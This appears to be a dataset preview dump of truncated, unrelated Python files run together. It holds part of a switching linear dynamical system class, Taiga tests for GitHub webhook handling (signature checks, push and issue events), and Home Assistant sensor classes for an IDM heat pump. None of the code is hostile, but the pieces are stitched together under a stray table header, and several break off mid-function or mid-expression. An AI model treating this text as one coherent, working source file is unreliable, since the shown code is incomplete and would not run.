input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
import copy
import warnings
from tqdm.auto import trange
import autograd.numpy as np
import autograd.numpy.random as npr
from autograd.tracer import getval
from autograd.misc import flatten
from autograd import value_and_grad
from ssm.optimizers import adam_step, rmsprop_step, sgd_step, convex_combination
from ssm.primitives import hmm_normalizer, hmm_expected_states, hmm_filter, hmm_sample, viterbi
from ssm.util import ensure_args_are_lists, ensure_args_not_none, \
ensure_slds_args_not_none, ensure_variational_args_are_lists, \
replicate, collapse
import ssm.observations as obs
import ssm.transitions as trans
import ssm.init_state_distns as isd
import ssm.hierarchical as hier
import ssm.emissions as emssn
import ssm.hmm as hmm
__all__ = ['SLDS', 'LDS']
class SLDS(object):
"""
Switching linear dynamical system fit with
stochastic variational inference on the marginal model,
integrating out the discrete states.
"""
def __init__(self, N, K, D, *, M=0,
init_state_distn=None,
transitions="standard",
transition_kwargs=None,
hierarchical_transition_tags=None,
dynamics="gaussian",
dynamics_kwargs=None,
hierarchical_dynamics_tags=None,
emissions="gaussian_orthog",
emission_kwargs=None,
hierarchical_emission_tags=None,
single_subspace=True,
**kwargs):
# Make the initial state distribution
if init_state_distn is None:
init_state_distn = isd.InitialStateDistribution(K, D, M=M)
assert isinstance(init_state_distn, isd.InitialStateDistribution)
# Make the transition model
transition_classes = dict(
standard=trans.StationaryTransitions,
stationary=trans.StationaryTransitions,
sticky=trans.StickyTransitions,
inputdriven=trans.InputDrivenTransitions,
recurrent=trans.RecurrentTransitions,
recurrent_only=trans.RecurrentOnlyTransitions,
rbf_recurrent=trans.RBFRecurrentTransitions,
nn_recurrent=trans.NeuralNetworkRecurrentTransitions
)
if isinstance(transitions, str):
transitions = transitions.lower()
if transitions not in transition_classes:
raise Exception("Invalid transition model: {}. Must be one of {}".
format(transitions, list(transition_classes.keys())))
transition_kwargs = transition_kwargs or {}
transitions = transition_classes[transitions](K, D, M=M, **transition_kwargs)
if not isinstance(transitions, trans.Transitions):
raise TypeError("'transitions' must be a subclass of"
" ssm.transitions.Transitions")
# Make the dynamics distn
dynamics_classes = dict(
none=obs.GaussianObservations,
gaussian=obs.AutoRegressiveObservations,
diagonal_gaussian=obs.AutoRegressiveDiagonalNoiseObservations,
t=obs.RobustAutoRegressiveObservations,
studentst=obs.RobustAutoRegressiveObservations,
diagonal_t=obs.RobustAutoRegressiveDiagonalNoiseObservations,
diagonal_studentst=obs.RobustAutoRegressiveDiagonalNoiseObservations,
)
if isinstance(dynamics, str):
dynamics = dynamics.lower()
if dynamics not in dynamics_classes:
raise Exception("Invalid dynamics model: {}. Must be one of {}".
format(dynamics, list(dynamics_classes.keys())))
dynamics_kwargs = dynamics_kwargs or {}
dynamics = dynamics_classes[dynamics](K, D, M=M, **dynamics_kwargs)
if not isinstance(dynamics, obs.Observations):
raise TypeError("'dynamics' must be a subclass of"
" ssm.observations.Observations")
# Make the emission distn
emission_classes = dict(
gaussian=emssn.GaussianEmissions,
gaussian_orthog=emssn.GaussianOrthogonalEmissions,
gaussian_id=emssn.GaussianIdentityEmissions,
gaussian_nn=emssn.GaussianNeuralNetworkEmissions,
studentst=emssn.StudentsTEmissions,
studentst_orthog=emssn.StudentsTOrthogonalEmissions,
studentst_id=emssn.StudentsTIdentityEmissions,
studentst_nn=emssn.StudentsTNeuralNetworkEmissions,
t=emssn.StudentsTEmissions,
t_orthog=emssn.StudentsTOrthogonalEmissions,
t_id=emssn.StudentsTIdentityEmissions,
t_nn=emssn.StudentsTNeuralNetworkEmissions,
poisson=emssn.PoissonEmissions,
poisson_orthog=emssn.PoissonOrthogonalEmissions,
poisson_id=emssn.PoissonIdentityEmissions,
poisson_nn=emssn.PoissonNeuralNetworkEmissions,
bernoulli=emssn.BernoulliEmissions,
bernoulli_orthog=emssn.BernoulliOrthogonalEmissions,
bernoulli_id=emssn.BernoulliIdentityEmissions,
bernoulli_nn=emssn.BernoulliNeuralNetworkEmissions,
ar=emssn.AutoRegressiveEmissions,
ar_orthog=emssn.AutoRegressiveOrthogonalEmissions,
ar_id=emssn.AutoRegressiveIdentityEmissions,
ar_nn=emssn.AutoRegressiveNeuralNetworkEmissions,
autoregressive=emssn.AutoRegressiveEmissions,
autoregressive_orthog=emssn.AutoRegressiveOrthogonalEmissions,
autoregressive_id=emssn.AutoRegressiveIdentityEmissions,
autoregressive_nn=emssn.AutoRegressiveNeuralNetworkEmissions
)
if isinstance(emissions, str):
emissions = emissions.lower()
if emissions not in emission_classes:
raise Exception("Invalid emission model: {}. Must be one of {}".
format(emissions, list(emission_classes.keys())))
emission_kwargs = emission_kwargs or {}
emissions = emission_classes[emissions](N, K, D, M=M,
single_subspace=single_subspace, **emission_kwargs)
if not isinstance(emissions, emssn.Emissions):
raise TypeError("'emissions' must be a subclass of"
" ssm.emissions.Emissions")
self.N, self.K, self.D, self.M = N, K, D, M
self.init_state_distn = init_state_distn
self.transitions = transitions
self.dynamics = dynamics
self.emissions = emissions
@property
def params(self):
return self.init_state_distn.params, \
self.transitions.params, \
self.dynamics.params, \
self.emissions.params
@params.setter
def params(self, value):
self.init_state_distn.params = value[0]
self.transitions.params = value[1]
self.dynamics.params = value[2]
self.emissions.params = value[3]
@ensure_args_are_lists
def initialize(self, datas, inputs=None, masks=None, tags=None, num_em_iters=25):
# First initialize the observation model
self.emissions.initialize(datas, inputs, masks, tags)
# Get the initialized variational mean for the data
xs = [self.emissions.invert(data, input, mask, tag)
for data, input, mask, tag in zip(datas, inputs, masks, tags)]
xmasks = [np.ones_like(x, dtype=bool) for x in xs]
# Now run a few iterations of EM on a ARHMM with the variational mean
print("Initializing with an ARHMM using {} steps of EM.".format(num_em_iters))
arhmm = hmm.HMM(self.K, self.D, M=self.M,
init_state_distn=copy.deepcopy(self.init_state_distn),
transitions=copy.deepcopy(self.transitions),
observations=copy.deepcopy(self.dynamics))
arhmm.fit(xs, inputs=inputs, masks=xmasks, tags=tags,
method="em", num_em_iters=num_em_iters)
self.init_state_distn = copy.deepcopy(arhmm.init_state_distn)
self.transitions = copy.deepcopy(arhmm.transitions)
self.dynamics = copy.deepcopy(arhmm.observations)
def permute(self, perm):
"""
Permute the discrete latent states.
"""
assert np.all(np.sort(perm) == np.arange(self.K))
self.init_state_distn.permute(perm)
self.transitions.permute(perm)
self.dynamics.permute(perm)
self.emissions.permute(perm)
def log_prior(self):
"""
Compute the log prior probability of the model parameters
"""
return self.init_state_distn.log_prior() + \
self.transitions.log_prior() + \
self.dynamics.log_prior() + \
self.emissions.log_prior()
def sample(self, T, input=None, tag=None, prefix=None, with_noise=True):
K = self.K
D = (self.D,) if isinstance(self.D, int) else self.D
M = (self.M,) if isinstance(self.M, int) else self.M
assert isinstance(D, tuple)
assert isinstance(M, tuple)
# If prefix is given, pad the output with it
if prefix is None:
pad = 1
z = np.zeros(T+1, dtype=int)
x = np.zeros((T+1,) + D)
data = np.zeros((T+1,) + D)
input = np.zeros((T+1,) + M) if input is None else input
xmask = np.ones((T+1,) + D, dtype=bool)
# Sample the first state from the initial distribution
pi0 = np.exp(self.init_state_distn.log_initial_state_distn(data, input, xmask, tag))
z[0] = npr.choice(self.K, p=pi0)
x[0] = self.dynamics.sample_x(z[0], x[:0], tag=tag, with_noise=with_noise)
else:
zhist, xhist, yhist = prefix
pad = len(zhist)
assert zhist.dtype == int and zhist.min() >= 0 and zhist.max() < K
assert xhist.shape == (pad, D)
assert yhist.shape == (pad, N)
z = np.concatenate((zhist, np.zeros(T, dtype=int)))
x = np.concatenate((xhist, np.zeros((T,) + D)))
input = np.zeros((T+pad,) + M) if input is None else input
xmask = np.ones((T+pad,) + D, dtype=bool)
# Sample z and x
for t in range(pad, T+pad):
Pt = np.exp(self.transitions.log_transition_matrices(x[t-1:t+1], input[t-1:t+1], mask=xmask[t-1:t+1], tag=tag))[0]
z[t] = npr.choice(self.K, p=Pt[z[t-1]])
x[t] = self.dynamics.sample_x(z[t], x[:t], input=input[t], tag=tag, with_noise=with_noise)
# Sample observations given latent states
# TODO: sample in the loop above?
y = self.emissions.sample(z, x, input=input, tag=tag)
return z[pad:], x[pad:], y[pad:]
@ensure_slds_args_not_none
def expected_states(self, variational_mean, data, input=None, mask=None, tag=None):
x_mask = np.ones_like(variational_mean, dtype=bool)
log_pi0 = self.init_state_distn.log_initial_state_distn(variational_mean, input, x_mask, tag)
log_Ps = self.transitions.log_transition_matrices(variational_mean, input, x_mask, tag)
log_likes = self.dynamics.log_likelihoods(variational_mean, input, x_mask, tag)
log_likes += self.emissions.log_likelihoods(data, input, mask, tag, variational_mean)
return hmm_expected_states(log_pi0, log_Ps, log_likes)
@ensure_slds_args_not_none
def most_likely_states(self, variational_mean, data, input=None, mask=None, tag=None):
log_pi0 = self.init_state_distn.log_initial_state_distn(variational_mean, input, mask, tag)
log_Ps = self.transitions.log_transition_matrices(variational_mean, input, mask, tag)
log_likes = self.dynamics.log_likelihoods(variational_mean, input, np.ones_like(variational_mean, dtype=bool), tag)
log_likes += self.emissions.log_likelihoods(data, input, mask, tag, variational_mean)
return viterbi(log_pi0, log_Ps, log_likes)
@ensure_slds_args_not_none
def smooth(self, variational_mean, data, input=None, mask=None, tag=None):
"""
Compute the mean observation under the posterior distribution
of latent discrete states.
"""
Ez, _, _ = self.expected_states(variational_mean, data, input, mask, tag)
return self.emissions.smooth(Ez, variational_mean, data, input, tag)
@ensure_args_are_lists
def log_probability(self, datas, inputs=None, masks=None, tags=None):
warnings.warn("Cannot compute exact marginal log probability for the SLDS. "
"the ELBO instead.")
return np.nan
@ensure_variational_args_are_lists
def elbo(self, variational_posterior, datas, inputs=None, masks=None, tags=None, n_samples=1):
"""
Lower bound on the marginal likelihood p(y | theta)
using variational posterior q(x; phi) where phi = variational_params
"""
elbo = 0
for sample in range(n_samples):
# Sample x from the variational posterior
xs = variational_posterior.sample()
# log p(theta)
elbo += self.log_prior()
# log p(x, y | theta) = log \sum_z p(x, y, z | theta)
for x, data, input, mask, tag in zip(xs, datas, inputs, masks, tags):
# The "mask" for x is all ones
x_mask = np.ones_like(x, dtype=bool)
log_pi0 = self.init_state_distn.log_initial_state_distn(x, input, x_mask, tag)
log_Ps = self.transitions.log_transition_matrices(x, input, x_mask, tag)
log_likes = self.dynamics.log_likelihoods(x, input, x_mask, tag)
log_likes += self.emissions.log_likelihoods(data, input, mask, tag, x)
elbo += hmm_normalizer(log_pi0, log_Ps, log_likes)
# -log q(x)
elbo -= variational_posterior.log_density(xs)
assert np.isfinite(elbo)
return elbo / n_samples
@ensure_variational_args_are_lists
def _surrogate_elbo(self, variational_posterior, datas, inputs=None, masks=None, tags=None,
alpha=0.75, **kwargs):
"""
Lower bound on the marginal likelihood p(y | gamma)
using variational posterior q(x; phi) where phi = variational_params
and gamma = emission parameters. As part of computing this objective,
we optimize q(z | x) and take a natural gradient step wrt theta, the
parameters of the dynamics model.
Note that the surrogate ELBO is a lower bound on the ELBO above.
E_p(z | x, y)[log p(z, x, y)]
= E_p(z | x, y)[log p(z, x, y) - log p(z | x, y) + log p(z | x, y)]
= E_p(z | x, y)[log p(x, y) + log p(z | x, y)]
= log p(x, y) + E_p(z | x, y)[log p(z | x, y)]
= log p(x, y) -H[p(z | x, y)]
<= log p(x, y)
with equality only when p(z | x, y) is atomic. The gap equals the
entropy of the posterior on z.
"""
# log p(theta)
elbo = self.log_prior()
# Sample x from the variational posterior
xs = variational_posterior.sample()
# Inner optimization: find the true posterior p(z | x, y; theta).
# Then maximize the inner ELBO wrt theta,
#
# E_p(z | x, y; theta_fixed)[log p(z, x, y; theta).
#
# This can be seen as a natural gradient step in theta
# space. Note: we do not want to compute gradients wrt x or the
# emissions parameters backward throgh this optimization step,
# so we unbox them first.
xs_unboxed = [getval(x) for x in xs]
emission_params_boxed = self.emissions.params
flat_emission_params_boxed, unflatten = flatten(emission_params_boxed)
self.emissions.params = unflatten(getval(flat_emission_params_boxed))
# E step: compute the true posterior | |
<filename>tests/integration/test_hooks_github.py
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# Copyright (C) 2014-2017 <NAME> <<EMAIL>>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
from unittest import mock
from django.core.urlresolvers import reverse
from django.core import mail
from taiga.base.utils import json
from taiga.hooks.github import event_hooks
from taiga.hooks.github.api import GitHubViewSet
from taiga.hooks.exceptions import ActionSyntaxException
from taiga.projects import choices as project_choices
from taiga.projects.epics.models import Epic
from taiga.projects.issues.models import Issue
from taiga.projects.tasks.models import Task
from taiga.projects.userstories.models import UserStory
from taiga.projects.models import Membership
from taiga.projects.history.services import get_history_queryset_by_model_instance, take_snapshot
from taiga.projects.notifications.choices import NotifyLevel
from taiga.projects.notifications.models import NotifyPolicy
from taiga.projects import services
from .. import factories as f
pytestmark = pytest.mark.django_db
def test_bad_project(client):
project = f.ProjectFactory()
url = reverse("github-hook-list")
url = "%s?project=%s-extra-text-added" % (url, project.id)
data = {"test:": "data"}
response = client.post(url, json.dumps(data),
HTTP_X_HUB_SIGNATURE="sha1=3c8e83fdaa266f81c036ea0b71e98eb5e054581a",
content_type="application/json")
response_content = response.data
assert response.status_code == 400
assert "The project doesn't exist" in response_content["_error_message"]
def test_bad_signature(client):
project = f.ProjectFactory()
url = reverse("github-hook-list")
url = "%s?project=%s" % (url, project.id)
data = {}
response = client.post(url, json.dumps(data),
HTTP_X_HUB_SIGNATURE="sha1=badbadbad",
content_type="application/json")
response_content = response.data
assert response.status_code == 400
assert "Bad signature" in response_content["_error_message"]
def test_ok_signature(client):
project = f.ProjectFactory()
f.ProjectModulesConfigFactory(project=project, config={
"github": {
"secret": "<KEY>"
}
})
url = reverse("github-hook-list")
url = "%s?project=%s" % (url, project.id)
data = {"test:": "data"}
response = client.post(url, json.dumps(data),
HTTP_X_HUB_SIGNATURE="sha1=3c8e83fdaa266f81c036ea0b71e98eb5e054581a",
content_type="application/json")
assert response.status_code == 204
def test_blocked_project(client):
project = f.ProjectFactory(blocked_code=project_choices.BLOCKED_BY_STAFF)
f.ProjectModulesConfigFactory(project=project, config={
"github": {
"secret": "<KEY>"
}
})
url = reverse("github-hook-list")
url = "%s?project=%s" % (url, project.id)
data = {"test:": "data"}
response = client.post(url, json.dumps(data),
HTTP_X_HUB_SIGNATURE="sha1=3c8e83fdaa266f81c036ea0b71e98eb5e054581a",
content_type="application/json")
assert response.status_code == 451
def test_push_event_detected(client):
project = f.ProjectFactory()
url = reverse("github-hook-list")
url = "%s?project=%s" % (url, project.id)
data = {"commits": [
{"message": "test message"},
]}
GitHubViewSet._validate_signature = mock.Mock(return_value=True)
with mock.patch.object(event_hooks.PushEventHook, "process_event") as process_event_mock:
response = client.post(url, json.dumps(data),
HTTP_X_GITHUB_EVENT="push",
content_type="application/json")
assert process_event_mock.call_count == 1
assert response.status_code == 204
def test_push_event_epic_processing(client):
creation_status = f.EpicStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_epics"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
new_status = f.EpicStatusFactory(project=creation_status.project)
epic = f.EpicFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s #%s ok
bye!
""" % (epic.ref, new_status.slug)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(epic.project, payload)
ev_hook.process_event()
epic = Epic.objects.get(id=epic.id)
assert epic.status.id == new_status.id
assert len(mail.outbox) == 1
def test_push_event_issue_processing(client):
creation_status = f.IssueStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_issues"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
new_status = f.IssueStatusFactory(project=creation_status.project)
issue = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s #%s ok
bye!
""" % (issue.ref, new_status.slug)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(issue.project, payload)
ev_hook.process_event()
issue = Issue.objects.get(id=issue.id)
assert issue.status.id == new_status.id
assert len(mail.outbox) == 1
def test_push_event_task_processing(client):
creation_status = f.TaskStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_tasks"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
new_status = f.TaskStatusFactory(project=creation_status.project)
task = f.TaskFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s #%s ok
bye!
""" % (task.ref, new_status.slug)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(task.project, payload)
ev_hook.process_event()
task = Task.objects.get(id=task.id)
assert task.status.id == new_status.id
assert len(mail.outbox) == 1
def test_push_event_user_story_processing(client):
creation_status = f.UserStoryStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_us"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
new_status = f.UserStoryStatusFactory(project=creation_status.project)
user_story = f.UserStoryFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s #%s ok
bye!
""" % (user_story.ref, new_status.slug)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(user_story.project, payload)
ev_hook.process_event()
user_story = UserStory.objects.get(id=user_story.id)
assert user_story.status.id == new_status.id
assert len(mail.outbox) == 1
def test_push_event_issue_mention(client):
creation_status = f.IssueStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_issues"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
issue = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
take_snapshot(issue, user=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s ok
bye!
""" % (issue.ref)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(issue.project, payload)
ev_hook.process_event()
issue_history = get_history_queryset_by_model_instance(issue)
assert issue_history.count() == 1
assert issue_history[0].comment.startswith("This issue has been mentioned by")
assert len(mail.outbox) == 1
def test_push_event_task_mention(client):
creation_status = f.TaskStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_tasks"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
task = f.TaskFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
take_snapshot(task, user=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s ok
bye!
""" % (task.ref)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(task.project, payload)
ev_hook.process_event()
task_history = get_history_queryset_by_model_instance(task)
assert task_history.count() == 1
assert task_history[0].comment.startswith("This task has been mentioned by")
assert len(mail.outbox) == 1
def test_push_event_user_story_mention(client):
creation_status = f.UserStoryStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_us"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
user_story = f.UserStoryFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
take_snapshot(user_story, user=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s ok
bye!
""" % (user_story.ref)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(user_story.project, payload)
ev_hook.process_event()
us_history = get_history_queryset_by_model_instance(user_story)
assert us_history.count() == 1
assert us_history[0].comment.startswith("This user story has been mentioned by")
assert len(mail.outbox) == 1
def test_push_event_multiple_actions(client):
creation_status = f.IssueStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_issues"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
new_status = f.IssueStatusFactory(project=creation_status.project)
issue1 = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
issue2 = f.IssueFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test TG-%s #%s ok
test TG-%s #%s ok
bye!
""" % (issue1.ref, new_status.slug, issue2.ref, new_status.slug)},
]}
mail.outbox = []
ev_hook1 = event_hooks.PushEventHook(issue1.project, payload)
ev_hook1.process_event()
issue1 = Issue.objects.get(id=issue1.id)
issue2 = Issue.objects.get(id=issue2.id)
assert issue1.status.id == new_status.id
assert issue2.status.id == new_status.id
assert len(mail.outbox) == 2
def test_push_event_processing_case_insensitive(client):
creation_status = f.TaskStatusFactory()
role = f.RoleFactory(project=creation_status.project, permissions=["view_tasks"])
f.MembershipFactory(project=creation_status.project, role=role, user=creation_status.project.owner)
new_status = f.TaskStatusFactory(project=creation_status.project)
task = f.TaskFactory.create(status=creation_status, project=creation_status.project, owner=creation_status.project.owner)
payload = {"commits": [
{"message": """test message
test tg-%s #%s ok
bye!
""" % (task.ref, new_status.slug.upper())},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(task.project, payload)
ev_hook.process_event()
task = Task.objects.get(id=task.id)
assert task.status.id == new_status.id
assert len(mail.outbox) == 1
def test_push_event_task_bad_processing_non_existing_ref(client):
issue_status = f.IssueStatusFactory()
payload = {"commits": [
{"message": """test message
test TG-6666666 #%s ok
bye!
""" % (issue_status.slug)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(issue_status.project, payload)
with pytest.raises(ActionSyntaxException) as excinfo:
ev_hook.process_event()
assert str(excinfo.value) == "The referenced element doesn't exist"
assert len(mail.outbox) == 0
def test_push_event_us_bad_processing_non_existing_status(client):
user_story = f.UserStoryFactory.create()
payload = {"commits": [
{"message": """test message
test TG-%s #non-existing-slug ok
bye!
""" % (user_story.ref)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(user_story.project, payload)
with pytest.raises(ActionSyntaxException) as excinfo:
ev_hook.process_event()
assert str(excinfo.value) == "The status doesn't exist"
assert len(mail.outbox) == 0
def test_push_event_bad_processing_non_existing_status(client):
issue = f.IssueFactory.create()
payload = {"commits": [
{"message": """test message
test TG-%s #non-existing-slug ok
bye!
""" % (issue.ref)},
]}
mail.outbox = []
ev_hook = event_hooks.PushEventHook(issue.project, payload)
with pytest.raises(ActionSyntaxException) as excinfo:
ev_hook.process_event()
assert str(excinfo.value) == "The status doesn't exist"
assert len(mail.outbox) == 0
def test_issues_event_opened_issue(client):
issue = f.IssueFactory.create()
issue.project.default_issue_status = issue.status
issue.project.default_issue_type = issue.type
issue.project.default_severity = issue.severity
issue.project.default_priority = issue.priority
issue.project.save()
Membership.objects.create(user=issue.owner, project=issue.project, role=f.RoleFactory.create(project=issue.project), is_admin=True)
notify_policy = NotifyPolicy.objects.get(user=issue.owner, project=issue.project)
notify_policy.notify_level = NotifyLevel.all
notify_policy.save()
payload = {
"action": "opened",
"issue": {
"title": "test-title",
"body": "test-body",
"html_url": "http://github.com/test/project/issues/11",
},
"assignee": {},
"label": {},
"repository": {
"html_url": "test",
},
}
mail.outbox = []
ev_hook = event_hooks.IssuesEventHook(issue.project, payload)
ev_hook.process_event()
assert Issue.objects.count() == 2
assert len(mail.outbox) == 1
def test_issues_event_other_than_opened_issue(client):
issue = f.IssueFactory.create()
issue.project.default_issue_status = issue.status
issue.project.default_issue_type = issue.type
issue.project.default_severity = issue.severity
issue.project.default_priority = issue.priority
issue.project.save()
payload = {
"action": "closed",
"issue": {
"title": "test-title",
"body": "test-body",
"html_url": "http://github.com/test/project/issues/11",
},
"assignee": {},
"label": {},
}
mail.outbox = []
ev_hook = event_hooks.IssuesEventHook(issue.project, payload)
ev_hook.process_event()
assert Issue.objects.count() == 1
assert len(mail.outbox) == 0
def test_issues_event_bad_issue(client):
issue = f.IssueFactory.create()
issue.project.default_issue_status = issue.status
issue.project.default_issue_type = issue.type
issue.project.default_severity = issue.severity
issue.project.default_priority = issue.priority
issue.project.save()
payload = {
"action": "opened",
"issue": {},
"assignee": {},
"label": {},
}
mail.outbox = []
ev_hook = event_hooks.IssuesEventHook(issue.project, payload)
with pytest.raises(ActionSyntaxException) as excinfo:
ev_hook.process_event()
assert str(excinfo.value) == "Invalid issue information"
assert Issue.objects.count() == 1
assert len(mail.outbox) == 0
def test_issue_comment_event_on_existing_issue_task_and_us(client):
project = f.ProjectFactory()
role = f.RoleFactory(project=project, permissions=["view_tasks", "view_issues", "view_us"])
f.MembershipFactory(project=project, role=role, user=project.owner)
user = f.UserFactory()
issue = f.IssueFactory.create(external_reference=["github", "http://github.com/test/project/issues/11"], owner=project.owner, project=project)
take_snapshot(issue, user=user)
task = f.TaskFactory.create(external_reference=["github", "http://github.com/test/project/issues/11"], owner=project.owner, project=project)
take_snapshot(task, user=user)
us = f.UserStoryFactory.create(external_reference=["github", "http://github.com/test/project/issues/11"], owner=project.owner, project=project)
take_snapshot(us, user=user)
payload = {
"action": "created",
"issue": {
"html_url": "http://github.com/test/project/issues/11",
},
"comment": {
"body": "Test body",
},
"repository": {
"html_url": "test",
},
}
mail.outbox = []
assert get_history_queryset_by_model_instance(issue).count() == 0
assert | |
from abc import ABC, abstractmethod, abstractproperty
from dataclasses import dataclass
from typing import Dict, List, Union
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntityDescription,
SensorStateClass,
)
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntityDescription,
)
from homeassistant.const import (
CURRENCY_EURO,
ENERGY_KILO_WATT_HOUR,
PERCENTAGE,
POWER_KILO_WATT,
TEMP_CELSIUS,
)
from pymodbus.payload import BinaryPayloadDecoder
from .const import BINARY_SENSOR, CONF_DISPLAY_NAME
@dataclass
class IdmSensorAddress(ABC):
"""Describes one of the sensors of an IDM heatpump"""
address: int
name: str
device_class: SensorDeviceClass
state_class: SensorStateClass
@abstractproperty
def size(self) -> int:
"""Number of registers this sensor's value occupies"""
@abstractmethod
def decode(self, decoder: BinaryPayloadDecoder):
"""Decode this sensor's value"""
def entity_description(self, config_entry) -> SensorEntityDescription:
"""SensorEntityDescription for this sensor"""
@dataclass
class IdmBinarySensorAddress:
"""Describes one of the binary sensors of an IDM heatpump"""
address: int
name: str
device_class: BinarySensorDeviceClass
@property
def size(self) -> int:
"""Number of registers this sensor's value occupies"""
return 1
def decode(self, decoder: BinaryPayloadDecoder) -> bool:
"""Decode this sensor's value"""
value = decoder.decode_16bit_uint()
return value == 1
def entity_description(self, config_entry) -> BinarySensorEntityDescription:
"""SensorEntityDescription for this sensor"""
return BinarySensorEntityDescription(
key=self.name,
name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
device_class=self.device_class,
)
@dataclass
class _FloatSensorAddress(IdmSensorAddress):
unit: str
decimal_digits: int = 2
scale: float = 1
min_value: Union[float, None] = None
max_value: Union[float, None] = 0xFFFE
@property
def size(self):
return 2
def decode(self, decoder: BinaryPayloadDecoder) -> float:
value = round(decoder.decode_32bit_float() * self.scale, self.decimal_digits)
return (
None
if (self.min_value is not None and value < self.min_value)
or (self.max_value is not None and value > self.max_value)
else value
)
def entity_description(self, config_entry):
return SensorEntityDescription(
key=self.name,
name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
device_class=self.device_class,
state_class=self.state_class,
native_unit_of_measurement=self.unit,
)
@dataclass
class _UCharSensorAddress(IdmSensorAddress):
unit: str
min_value: Union[int, None] = None
max_value: Union[int, None] = 0xFFFE
@property
def size(self):
return 1
def decode(self, decoder: BinaryPayloadDecoder) -> int:
value = decoder.decode_16bit_uint()
return (
None
if (self.min_value is not None and value < self.min_value)
or (self.max_value is not None and value > self.max_value)
else value
)
def entity_description(self, config_entry):
return SensorEntityDescription(
key=self.name,
name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
device_class=self.device_class,
state_class=self.state_class,
native_unit_of_measurement=self.unit,
)
@dataclass
class _WordSensorAddress(IdmSensorAddress):
unit: str
min_value: Union[int, None] = None
max_value: Union[int, None] = None
@property
def size(self):
return 1
def decode(self, decoder: BinaryPayloadDecoder) -> int:
value = decoder.decode_16bit_uint()
return (
None
if (self.min_value is not None and value < self.min_value)
or (self.max_value is not None and value > self.max_value)
else value
)
def entity_description(self, config_entry):
return SensorEntityDescription(
key=self.name,
name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
device_class=self.device_class,
state_class=self.state_class,
native_unit_of_measurement=self.unit,
)
@dataclass
class _EnumSensorAddress(IdmSensorAddress):
value_labels: Dict[int, str]
@property
def size(self):
return 1
def decode(self, decoder: BinaryPayloadDecoder) -> str:
value = decoder.decode_16bit_uint()
if value == 0xFFFF:
return None
return self.value_labels.get(value)
def entity_description(self, config_entry):
return SensorEntityDescription(
key=self.name,
name=f"{config_entry.data.get(CONF_DISPLAY_NAME)}: {SENSOR_NAMES.get(self.address)}",
device_class=self.device_class,
state_class=self.state_class,
)
@dataclass
class _BitFieldSensorAddress(IdmSensorAddress):
bit_labels: Dict[int, str]
@property
def size(self):
return 1
def decode(self, decoder: BinaryPayloadDecoder) -> str:
value = decoder.decode_16bit_uint()
if value == 0xFFFF:
return None
if value == 0:
return self.bit_labels.get(0)
return ", ".join(
